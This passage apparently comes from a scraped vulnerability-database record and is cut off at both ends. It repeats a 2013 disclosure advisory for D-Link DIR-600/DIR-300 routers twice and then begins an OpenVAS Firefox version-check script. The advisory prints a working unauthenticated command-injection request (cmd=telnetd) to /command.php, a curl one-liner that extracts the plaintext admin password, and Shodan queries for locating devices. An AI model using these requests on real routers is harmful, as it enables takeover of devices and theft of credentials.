http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...\r\n\r\n============ Shodan Torks ============\r\n\r\nShodan search:\r\nServer: Linux, HTTP/1.1, DIR-300\r\nServer: Linux, HTTP/1.1, DIR-600\r\n\r\n============ Vulnerability Overview: ============\r\n\r\n * OS Command Injection (unauthenticated) \r\n\r\n=> Parameter cmd\r\n\r\nThe vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.\r\nIt is possible to start a telnetd to compromise the device.\r\n\r\nWARNING: You do not need to be authenticated to the device!\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png\r\n\r\nstarting a telnet server:\r\nRequest:\r\nPOST /command.php HTTP/1.1\r\nHost: 192.168.178.222\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: http://192.168.178.222/\r\nContent-Length: 15\r\nCookie: uid=hfaiGzkB4z\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\ncmd=telnetd;\r\n\r\nYou do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.\r\n\r\nFor example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*\r\n\r\nNmap Scan after starting the telnetd:\r\nNmap scan report for 192.168.178.222\r\nHost is up (0.022s latency).\r\nNot shown: 995 closed ports\r\nPORT STATE SERVICE VERSION\r\n1/tcp filtered tcpmux\r\n23/tcp open telnet BusyBox telnetd 1.14.1 <<==!!!\r\n<snip>\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png\r\n\r\n * Information disclosure: \r\n\r\nNice server banner to detect this type of devices easily:\r\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\r\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.12\r\n\r\n * For changing the current password there is no request to the current password \r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.\r\n\r\n * Insecure Cryptographic Storage: \r\n\r\nThere is no password hashing implemented and so it is saved in plain text on the system:\r\n# cat var/passwd\r\n\"admin\" \"test\" \"0\"\r\n\r\nPositive Technologies has released an advisory in 2011 and D-Link has fixed this issue:\r\nhttp://en.securitylab.ru/lab/PT-2011-30\r\nWith the current version of the firmware the passwords are stored again in plaintext.\r\n\r\nIf you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:\r\n\r\nroot@bt:~# curl --data \"cmd=cat /var/passwd\" http://<Target IP>/command.php\r\n\"admin\" \"THESECRETPASS\" \"0\"\r\nroot@bt:~#\r\n\r\n * Information Disclosure: \r\n\r\nDetailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.\r\n\r\nRequest:\r\nhttp://Target-IP/DevInfo.txt\r\n\r\nor try to access version.txt and have a look at the html source ;)\r\n\r\nResponse:\r\nHTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.14\r\nDate: Fri, 31 Dec 1999 18:04:13 GMT\r\nContent-Length: 267\r\n\r\nFirmware External Version: V2.14\r\nFirmware Internal Version: d1mg\r\nModel Name: DIR-600\r\nHardware Version: Bx\r\nWLAN Domain: 826\r\nKernel: 2.6.33.2\r\nLanguage: en\r\nGraphcal Authentication: Disable\r\nLAN MAC: <snip>\r\nWAN MAC: <snip>\r\nWLAN MAC: <snip>\r\n\r\nThese details are available without authentication.\r\n\r\n * Local path disclosure \r\n\r\nEvery piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.\r\n\r\nRequest:\r\nhttp://<IP>/router_info.xml\r\n\r\nResponse:\r\nHTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\r\nDate: Sat, 01 Jan 2000 21:22:43 GMT\r\nContent-Type: text/xml\r\nContent-Length: 49\r\n\r\nEPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)\r\n\r\n * Stored XSS via WLAN Assistent and Version Details \r\n\r\nInjecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.\r\n\r\n=> Parameter: SSID\r\n\r\nThe injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :)\r\nhttp://Target-IP/version.txt\r\n\r\n============ Solution ============\r\n\r\nNo known solution available.\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de/m1adv2013-003\r\nVideo: http://www.s3cur1ty.de/home-network-horror-days\r\n\r\n============ Time Line: ============\r\n\r\n14.12.2012 - discovered vulnerability\r\n14.12.2012 - contacted dlink with the new vulnerability details via webinterface\r\n20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link\r\n21.12.2012 - D'link responded that they will check the findings *h00ray*\r\n11.01.2013 - requested status update\r\n25.01.2013 - requested status update\r\n25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ...\r\n25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better\r\n04.02.2013 - no more responses from D'Link, public release\r\n\r\n===================== Advisory end =====================\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24453/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link DIR-600 DIR-300 (Rev B) - Multiple Vulnerabilities", "edition": 1, "published": "2013-02-05T00:00:00", "title": "D-Link DIR-600 DIR-300 (Rev B) - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-02-05T00:00:00", "id": "EXPLOITPACK:522F89A94E21322C3ACD5840FFF1CC99", "href": "", "sourceData": "Device Name: DIR-600 / DIR 300 - HW rev B1\nVendor: D-Link\n\n============ Vulnerable Firmware Releases - DIR-300: ============\n\nFirmware Version : 2.12 - 18.01.2012\nFirmware Version : 2.13 - 07.11.2012\n\n============ Vulnerable Firmware Releases - DIR-600: ============\n\nFirmware-Version : 2.12b02 - 17/01/2012\nFirmware-Version : 2.13b01 - 07/11/2012\nFirmware-Version : 2.14b01 - 22/01/2013\n\n============ Device Description: ============\n\nD-Link\u00ae introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.\n\nSource (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...\nGerman website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...\n\n============ Shodan Torks ============\n\nShodan search:\nServer: Linux, HTTP/1.1, DIR-300\nServer: Linux, HTTP/1.1, DIR-600\n\n============ Vulnerability Overview: ============\n\n * OS Command Injection (unauthenticated) \n\n=> Parameter cmd\n\nThe vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.\nIt is possible to start a telnetd to compromise the device.\n\nWARNING: You do not need to be authenticated to the device!\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png\n\nstarting a telnet server:\nRequest:\nPOST /command.php HTTP/1.1\nHost: 192.168.178.222\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: http://192.168.178.222/\nContent-Length: 15\nCookie: uid=hfaiGzkB4z\nPragma: no-cache\nCache-Control: no-cache\n\ncmd=telnetd;\n\nYou do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.\n\nFor example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*\n\nNmap Scan after starting the telnetd:\nNmap scan report for 192.168.178.222\nHost is up (0.022s latency).\nNot shown: 995 closed ports\nPORT STATE SERVICE VERSION\n1/tcp filtered tcpmux\n23/tcp open telnet BusyBox telnetd 1.14.1 <<==!!!\n<snip>\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png\n\n * Information disclosure: \n\nNice server banner to detect this type of devices easily:\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.12\n\n * For changing the current password there is no request to the current password \n\nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.\n\n * Insecure Cryptographic Storage: \n\nThere is no password hashing implemented and so it is saved in plain text on the system:\n# cat var/passwd\n\"admin\" \"test\" \"0\"\n\nPositive Technologies has released an advisory in 2011 and D-Link has fixed this issue:\nhttp://en.securitylab.ru/lab/PT-2011-30\nWith the current version of the firmware the passwords are stored again in plaintext.\n\nIf you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:\n\nroot@bt:~# curl --data \"cmd=cat /var/passwd\" http://<Target IP>/command.php\n\"admin\" \"THESECRETPASS\" \"0\"\nroot@bt:~#\n\n * Information Disclosure: \n\nDetailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.\n\nRequest:\nhttp://Target-IP/DevInfo.txt\n\nor try to access version.txt and have a look at the html source ;)\n\nResponse:\nHTTP/1.1 200 OK\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.14\nDate: Fri, 31 Dec 1999 18:04:13 GMT\nContent-Length: 267\n\nFirmware External Version: V2.14\nFirmware Internal Version: d1mg\nModel Name: DIR-600\nHardware Version: Bx\nWLAN Domain: 826\nKernel: 2.6.33.2\nLanguage: en\nGraphcal Authentication: Disable\nLAN MAC: <snip>\nWAN MAC: <snip>\nWLAN MAC: <snip>\n\nThese details are available without authentication.\n\n * Local path disclosure \n\nEvery piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.\n\nRequest:\nhttp://<IP>/router_info.xml\n\nResponse:\nHTTP/1.1 200 OK\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\nDate: Sat, 01 Jan 2000 21:22:43 GMT\nContent-Type: text/xml\nContent-Length: 49\n\nEPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)\n\n * Stored XSS via WLAN Assistent and Version Details \n\nInjecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.\n\n=> Parameter: SSID\n\nThe injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :)\nhttp://Target-IP/version.txt\n\n============ Solution ============\n\nNo known solution available.\n\n============ Credits ============\n\nThe vulnerability was discovered by Michael Messner\nMail: devnull#at#s3cur1ty#dot#de\nWeb: http://www.s3cur1ty.de/m1adv2013-003\nVideo: http://www.s3cur1ty.de/home-network-horror-days\n\n============ Time Line: ============\n\n14.12.2012 - discovered vulnerability\n14.12.2012 - contacted dlink with the new vulnerability details via webinterface\n20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link\n21.12.2012 - D'link responded that they will check the findings *h00ray*\n11.01.2013 - requested status update\n25.01.2013 - requested status update\n25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ...\n25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better\n04.02.2013 - no more responses from D'Link, public release\n\n===================== Advisory end =====================", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-01-11T11:06:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3026"], "description": "Check for the Version of mozilla", "modified": "2018-01-10T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:803005", "href": "http://plugins.openvas.org/nasl.php?oid=803005", "type": "openvas", "title": "Mandriva Update for mozilla MDVSA-2012:022 (mozilla)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mozilla MDVSA-2012:022 (mozilla)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security issues were identified and fixed in mozilla firefox and\n thunderbird:\n\n An integer overflow in the libpng library can lead to a heap-buffer\n overflow when decompressing certain PNG images. This leads to a crash,\n which may be potentially exploitable (CVE-2011-3026).\n\n The mozilla firefox and thunderbird packages has been upgraded to the\n latest respective versions whish is not affecte dby this security flaw.\n\n Additionally the rootcerts packages (root CA cerificates bundle)\n has been upgraded to the latest version as of 2012/02/18 and the NSS\n library has been rebuilt accordingly to pickup the changes.\";\n\ntag_affected = \"mozilla on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:022\");\n script_id(803005);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:31 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2011-3026\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:022\");\n script_name(\"Mandriva Update for mozilla MDVSA-2012:022 (mozilla)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mozilla\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ast\", rpm:\"firefox-ast~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_BD\", rpm:\"firefox-bn_BD~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_IN\", rpm:\"firefox-bn_IN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-br\", rpm:\"firefox-br~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bs\", rpm:\"firefox-bs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_ZA\", rpm:\"firefox-en_ZA~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_CL\", rpm:\"firefox-es_CL~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_MX\", rpm:\"firefox-es_MX~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fa\", rpm:\"firefox-fa~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gd\", rpm:\"firefox-gd~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hr\", rpm:\"firefox-hr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hy\", rpm:\"firefox-hy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kk\", rpm:\"firefox-kk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ku\", rpm:\"firefox-ku~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lg\", rpm:\"firefox-lg~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mai\", rpm:\"firefox-mai~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ml\", rpm:\"firefox-ml~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nso\", rpm:\"firefox-nso~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-or\", rpm:\"firefox-or~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sr\", rpm:\"firefox-sr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", 